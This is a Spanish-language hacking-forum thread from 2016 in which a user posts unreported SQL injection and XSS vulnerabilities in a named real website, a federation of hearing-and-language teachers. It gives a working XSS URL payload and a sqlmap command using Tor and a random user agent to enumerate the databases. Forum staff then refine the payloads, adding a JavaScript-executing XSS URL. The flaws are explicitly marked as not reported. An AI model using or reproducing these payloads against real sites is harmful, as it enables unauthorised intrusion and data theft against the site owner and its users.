[SQLi , XSS] www.fepal.net

  • 3 Respuestas
  • 2100 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado rreedd

  • *
  • Underc0der
  • Mensajes: 113
  • Actividad:
    0%
  • Country: 00
  • Reputación 6
  • Somos Nada Señores
    • Ver Perfil

[SQLi , XSS] www.fepal.net

  • en: Marzo 05, 2016, 09:37:52 pm
Hola !!!
Bienvenido a mi post

RREEDD
Sitio :http://www.fepal.net

Descripción del sitio:  Federación Española de Asociación de Profesores de Audición y Lenguaje.

Lista de Vulnerabilidades.
  • [XSS] Inyección en URL .
       
        Url del sitio :http://www.fepal.net/noticias.php?id=1
        Vector : <h1>underc0de</h1>
        xploit : http://www.fepal.net/noticias.php?id=<h1>underc0de</h1>&pg=1
        Reportado: NO
        Autor: RREEDD
  • [SQLi] Inyección en URL.
       
        Url del sitio :http://www.fepal.net/noticias.php?id=1
        Inyeccion :  sqlmap.py -u "www.fepal.net/noticias.php?id=1&pg=1" -p "id"  --tor --tor-type=SOCKS5 --check-tor --random-agent --dbs --time-sec 15
        Herramienta : SQLMAP
        Reportado: NO
        Autor: RREEDD
Saludos desde Chile
« Última modificación: Marzo 06, 2016, 08:28:17 am por EPSILON »

Desconectado EPSILON

  • *
  • Ex-Staff
  • *****
  • Mensajes: 360
  • Actividad:
    0%
  • Country: 00
  • Reputación 0
  • [email protected]
  • Skype: epsilon.root1
    • Ver Perfil

Re:[SQLi , XSS] www.fepal.net

  • en: Marzo 06, 2016, 08:50:58 am
@rreedd no se puede tomar como payload unos resultados de sqlmap por consola, tienes que poner la inyección entera por GET.

Saludos, EPSILON.

Desconectado rollth

  • *
  • Ex-Staff
  • *****
  • Mensajes: 884
  • Actividad:
    10%
  • Reputación 16
  • El conocimiento es libre.
  • Twitter: @RoloMijan
    • Ver Perfil
    • Whateversec
    • Email

Re:[SQLi , XSS] www.fepal.net

  • en: Marzo 06, 2016, 10:35:16 am
@rreedd no se puede tomar como payload unos resultados de sqlmap por consola, tienes que poner la inyección entera por GET.

Saludos, EPSILON.

Además de eso, cuando buscas una XSS tienes que buscar ejecutar código javascript, en muchas ocasiones te permite poner una etiqueta html, pero no se puede llegar a ejecutar un código javascript.

Éste Payload estaría mejor: "http://www.fepal.net/noticias.php?id=%3Ch1%20onclick=alert%280%29%3Eunderc0de%3C/h1%3E&pg=1"

Desconectado rreedd

  • *
  • Underc0der
  • Mensajes: 113
  • Actividad:
    0%
  • Country: 00
  • Reputación 6
  • Somos Nada Señores
    • Ver Perfil

Re:[SQLi , XSS] www.fepal.net

  • en: Marzo 06, 2016, 12:05:45 pm
RREEDDHola!!
@rreedd no se puede tomar como payload unos resultados de sqlmap por consola, tienes que poner la inyección entera por GET.

Saludos, EPSILON.
Gracias por la aclaración, porque mi intención al poner el payload de sqlmap era demostrar que era vulnerable, así que lo tendre en mente para la próxima.

Muchas gracias a todos por comentar.

Saludos desde Chile.